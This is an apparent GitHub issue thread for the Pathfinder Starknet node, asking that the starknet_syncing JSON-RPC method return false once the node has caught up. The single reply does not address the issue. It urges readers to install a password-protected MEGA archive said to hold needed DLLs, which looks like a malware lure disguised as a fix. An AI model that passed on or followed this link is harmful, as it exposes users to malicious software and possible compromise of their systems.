### ISSUE TITLE
JSON-RPC: Pathfinder should return `false` for `starknet_syncing` if it has caught up

### ISSUE THREAD

**Issue by kkovaacs** [eqlabs/pathfinder#2253]
The `starknet_syncing` method should return `false` if Pathfinder is caught-up. Currently we always return sync process details, even if we're caught up -- unfortunately this makes it impossible to check exclusively via JSON-RPC if a specific node is caught up or not.

**Comment by SAMBILI** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A

Password: changeme
I put the necessary dlls in the archive
